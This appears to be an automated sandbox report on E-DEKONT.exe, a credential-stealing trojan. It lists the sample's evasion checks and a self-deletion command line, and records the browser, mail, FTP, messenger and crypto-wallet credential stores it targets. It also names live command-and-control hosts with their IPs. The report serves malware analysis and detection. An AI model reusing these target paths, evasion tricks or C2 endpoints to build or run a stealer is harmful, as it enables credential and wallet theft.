                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization\sgelngdernes.Dep74
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede\memstat.c
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede\selection-end-symbolic.symbolic.png

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Program Files\qga\qga.exe
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6842D rdtsc 1_2_02B6842D
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: K32EnumDeviceDrivers, 1_2_02B86198
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004065C5 FindFirstFileW,FindClose, 1_2_004065C5
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405990
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00402862 FindFirstFileW, 1_2_00402862
                  Source: C:\Users\user\Desktop\E-DEKONT.exe System information queried: ModuleInformation
                  Source: C:\Users\user\Desktop\E-DEKONT.exe API call chain: ExitProcess graph end node graph_1-9270
                  Source: C:\Users\user\Desktop\E-DEKONT.exe API call chain: ExitProcess graph end node graph_1-9272
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
                  Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
                  Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
                  Source: E-DEKONT.exe, 00000004.00000003.108881783775.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108991550054.00000000019F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
                  Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_02B6842D rdtsc
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_02B66CB5 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_02B66CCE mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_02B71135 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_02B66D12 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_02B83D61 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Process queried: DebugPort
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_02B804ED CreateFileA,LdrLoadDll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Process created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
                  Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                  Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

                  Stealing of Sensitive Information

                  Source: Yara match; File source: 00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: E-DEKONT.exe PID: 4868, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: %appdata%\Electrum\wallets\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: %APPDATA%\Exodus\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: %APPDATA%\Ethereum\keystore\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: %appdata%\Electrum-LTC\wallets\
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                  Source: C:\Users\user\Desktop\E-DEKONT.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: Yara match; File source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: E-DEKONT.exe PID: 4868, type: MEMORYSTR
                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | 2 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
                  Default Accounts | Scheduled Task/Job | 1 Windows Service | 1 Access Token Manipulation | 1 Timestomp | 2 Credentials in Registry | 36 System Information Discovery | Remote Desktop Protocol | 4 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | At (Linux) | 1 Registry Run Keys / Startup Folder | 1 Windows Service | 1 DLL Side-Loading | 1 Credentials In Files | 121 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | 11 Process Injection | 1 File Deletion | NTDS | 11 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Masquerading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | 11 Virtualization/Sandbox Evasion | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                  Behavior Graph ID: 755881, Sample: E-DEKONT.exe, Startdate: 29/11/2022, Architecture: WINDOWS, Score: 100
                  • Sample-level nodes: dbxo1.shop; aapancart.com; Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
                  • E-DEKONT.exe (started)
                    • dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
                    • signatures: Self deletion via cmd or bat file; Tries to detect Any.run
                    • E-DEKONT.exe (started)
                      • DNS/IP: dbxo1.shop 104.21.44.194, 49852, 49859, 80 CLOUDFLARENETUS United States
                      • DNS/IP: aapancart.com 103.14.99.114, 443, 49851 TRUNKOZ-INTrunkozTechnologiesPvtLtdIN Singapore
                      • dropped: C:\Users\user\AppData\...\vcruntime140.dll, PE32; C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32; C:\Users\user\AppData\Local\...\softokn3.dll, PE32; 45 other files (none is malicious)
                      • signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); 6 other signatures
                      • cmd.exe (started)
                        • conhost.exe (started)
                        • timeout.exe (started)

                  Source | Detection | Scanner | Label | Link
                  E-DEKONT.exe | 26% | Virustotal | | Browse
                  E-DEKONT.exe | 21% | ReversingLabs | Win32.Trojan.Nemesis |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\mozglue.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\msvcp140.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\nss3.dll | 4% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\ucrtbase.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\75C649CD\vcruntime140.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll | 0% | ReversingLabs | |
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  aapancart.com | 2% | Virustotal | | Browse
                  Source | Detection | Scanner | Label | Link
                  http://dbxo1.shop/db1/index.phpl | 0% | Avira URL Cloud | safe |
                  http://dbxo1.shop/ | 0% | Avira URL Cloud | safe |
                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Avira URL Cloud | safe |
                  http://dbxo1.shop/db1/index.phpM | 0% | Avira URL Cloud | safe |
                  http://dbxo1.shop/db1/index.php | 0% | Avira URL Cloud | safe |
                  http://ocsp.thawte.com0 | 0% | Avira URL Cloud | safe |
                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Avira URL Cloud | safe |
                  http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe |
                  http://www.mozilla.com0 | 0% | Avira URL Cloud | safe |
                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Avira URL Cloud | safe |
